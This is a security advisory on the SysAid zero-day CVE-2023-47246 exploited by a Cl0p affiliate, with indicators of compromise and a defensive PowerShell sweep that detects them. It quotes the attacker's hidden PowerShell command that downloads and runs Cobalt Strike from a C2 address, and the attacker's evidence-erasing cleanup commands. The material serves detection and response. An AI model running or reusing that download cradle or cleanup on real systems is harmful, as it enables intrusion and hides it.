SysAid zero-day flaw exploited by Cl0p hacker gang
Take action: If you are using SysAid IT support and management software, download the patch and apply it as soon as possible. Such systems usually have an internet-facing ticketing interface, which is a likely attack vector. After patching, make a thorough review of the system for the indicators of compromise listed below. Be aggressive; don't wait for a repeat of MOVEit.
Learn More
A critical zero-day vulnerability within the SysAid IT support and management software has been identified as being exploited by Lace Tempest - an affiliate of the Cl0p ransomware group. The recent attacks, described as limited, were detected by Microsoft's Threat Intelligence team and communicated to SysAid on November 2, 2023.
The vulnerability is tracked as CVE-2023-47246 (no CVSS score had been assigned at the time of writing). It is a path traversal flaw that lets an attacker write files into the webroot of the SysAid Tomcat web service, leading to arbitrary code execution. The attackers exploited it by uploading a WAR archive containing a webshell and other tools; from there they dropped a malware loader (user.exe) that injected a trojan into system processes, and finally ran a second PowerShell script to erase evidence of the intrusion. SysAid, upon being notified, started its incident response process and reached out to on-premise customers with a mitigation.
SysAid has released a patch (v23.3.36) to address the vulnerability and is urging customers to update their systems. They have provided indicators of compromise for users to check for any unauthorized access or suspicious activities and to review logs for any unusual behavior that could indicate exploitation:
Hashes
| Filename | SHA256 | Comment |
|---|---|---|
| user.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Malicious loader |
IP Addresses
| IP | Comment |
|---|---|
| 81.19.138[.]52 | GraceWire Loader C2 |
| 45.182.189[.]100 | GraceWire Loader C2 |
| 179.60.150[.]34 | Cobalt Strike C2 |
| 45.155.37[.]105 | Meshagent remote admin tool C2 |
File Paths
| Path | Comment |
|---|---|
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe | GraceWire |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war | Archive of WebShells and tools used by the attacker |
| C:\Program Files\SysAidServer\tomcat\webapps\leave | Used as a flag for the attacker scripts during execution |
Commands
The following command was used to download and execute Cobalt Strike after initial access was established (C2 address defanged):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')
Post-Compromise Cleanup
After initial compromise, the attacker removed the payloads used to establish the foothold on the infected server. Evidence of the following commands having been run on a SysAid server indicates successful exploitation ($tomcat_dir and $wapps are variables in the attacker's script pointing at the Tomcat directory and its webapps folder):
- Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave"
- Remove-Item -Force "$wapps\usersfiles.war"
- Remove-Item -Force "$wapps\usersfiles\user.*"
- & "$wapps\usersfiles\user.exe"
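As an added example (not code from SysAid, Microsoft or this page), the following PowerShell sweep checks an on-premise SysAid server against the indicators in the tables above and the commands in this section. It assumes the default install path C:\Program Files\SysAidServer, that PowerShell script block logging (event ID 4104) is enabled, and an elevated session on the server itself; the "[.]" defanging in the IP addresses is removed so they can be compared with live connections.

```powershell
# Added example (not SysAid's or Microsoft's code): sweep an on-premise SysAid
# server for the indicators listed in this advisory. Assumptions: the default
# install path C:\Program Files\SysAidServer, PowerShell script block logging
# (event 4104) enabled, and an elevated session on the server itself.

$SysAidRoot = 'C:\Program Files\SysAidServer'      # assumption: default install path
$Webapps    = Join-Path $SysAidRoot 'tomcat\webapps'

# Indicators from the advisory; the "[.]" defanging is removed so values compare.
$KnownHash = 'b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d'
$C2Ips     = @('81.19.138.52', '45.182.189.100', '179.60.150.34', '45.155.37.105')
$IocPaths  = @(
    (Join-Path $Webapps 'usersfiles\user.exe'),   # GraceWire loader
    (Join-Path $Webapps 'usersfiles.war'),        # attacker's webshell archive
    (Join-Path $Webapps 'leave')                  # flag file for the attacker's scripts
)
# Regexes for the download cradle, the cleanup commands and the loader execution.
$ScriptBlockPatterns = @(
    'downloadstring\(''http://179\.60\.150\.34',
    'Remove-Item .*usersfiles\.war',
    'Remove-Item .*usersfiles\\user\.\*',
    'Remove-Item .*usersfiles\\leave',
    'usersfiles\\user\.exe'
)

$Findings = [System.Collections.Generic.List[string]]::new()

# 1. IOC file paths; if user.exe survived the cleanup, compare its hash too.
foreach ($p in $IocPaths) {
    if (-not (Test-Path -LiteralPath $p)) { continue }
    $Findings.Add("IOC path present: $p")
    if ($p -like '*\user.exe') {
        $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash.ToLower()
        if ($h -eq $KnownHash) { $Findings.Add('user.exe SHA256 matches the known loader') }
        else { $Findings.Add("user.exe present with an unlisted SHA256 (possible variant): $h") }
    }
}

# 2. The attacker deletes usersfiles.war, so also list every WAR and any
#    'usersfiles*' entry left in webapps for comparison with a known-good install.
Get-ChildItem -LiteralPath $Webapps -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -eq '.war' -or $_.Name -like 'usersfiles*' } |
    ForEach-Object {
        $Findings.Add("Review webapps entry: $($_.FullName) (modified $($_.LastWriteTime))")
    }

# 3. Live TCP connections to the listed C2 addresses.
Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $C2Ips -contains $_.RemoteAddress } |
    ForEach-Object {
        $Findings.Add("Connection to C2 $($_.RemoteAddress):$($_.RemotePort) from PID $($_.OwningProcess)")
    }

# 4. Script block logging: event 4104 stores the script text in its third property.
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
    $text = [string]$e.Properties[2].Value
    foreach ($rx in $ScriptBlockPatterns) {
        if ($text -match $rx) {
            $Findings.Add("Script block at $($e.TimeCreated) matches '$rx'")
            break
        }
    }
}

if ($Findings.Count -eq 0) {
    Write-Host 'No listed indicators found. Absence is not proof: the attacker deletes the WAR and loader, so also review Tomcat access logs and pre-patch backups.'
} else {
    $Findings | ForEach-Object { Write-Warning $_ }
}
```

Run it as Administrator on each on-premise SysAid server. A clean file-path result is expected after the attacker's own cleanup script has run, so treat script block and network hits as the stronger signals, and keep any matching user.exe or WAR for analysis rather than deleting it.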
Antivirus Detections
Microsoft Defender detects the components of this attack as the following threats:
- Trojan:Win32/TurtleLoader
- Backdoor:Win32/Clop
- Ransom:Win32/Clop